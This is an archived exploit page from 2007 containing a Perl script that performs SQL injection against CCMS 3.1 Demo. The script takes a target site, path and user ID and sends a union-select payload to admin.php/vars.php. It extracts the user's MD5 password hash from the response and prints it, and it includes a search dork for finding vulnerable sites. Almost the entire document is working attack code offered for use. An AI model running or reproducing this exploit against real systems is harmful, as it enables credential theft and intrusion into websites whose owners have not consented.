CCMS 3.1 Demo Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CCMS 3.1 Demo Remote SQL Injection Exploit
# Published : 2007-12-29
# Author : Pr0metheuS
# Previous Title : Mihalism Multi Forum Host <= 3.0.x Remote File Inclusion Vulnerability
# Next Title : xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability

#!/usr/bin/perl 
#Found by Pr0metheuS 
#Coded by Pr0metheuS 
#Gr33tz-Team 
#Dork : intitle:"CCMS v3.1 Demo PW" 
print "______________________________________n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|n"; 
print "______________________________________n"; 
print "[+] Enter SITE:n"; 
$SITE = <STDIN>; 
chomp $SITE; 
print "[+] Enter PATH:n"; 
$PATH = <STDIN>; 
chomp $PATH; 
print "[+] Enter USERID:n"; 
$USERID = <STDIN>; 
chomp $USERID; 
print "______________________________________n"; 
#Send Request 
use LWP::UserAgent; 
$ua = new LWP::UserAgent; 
$ua->agent("Mozilla/8.0"); 
$ua = LWP::UserAgent->new; 
my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); 
$req->header('Accept' => 'text/html'); 
$res = $ua->request($req); 
$con = $res->content; 
#FIND MD5 IN TEXT REGEX !!! 
if ($con =~ "/([0-9a-fA-F]{32})/") { 
print "______________________________________n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|n"; 
print "[+] Exploit successful!n"; 
print "[+] USERID:$USERIDn"; 
print "[+] MD5:$1n"; 
print "______________________________________n"; 
} 
else{ 
print "______________________________________n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|n"; 
    print "[+] Exploit Failed!n"; 
}

# www.Syue.com [2007-12-29]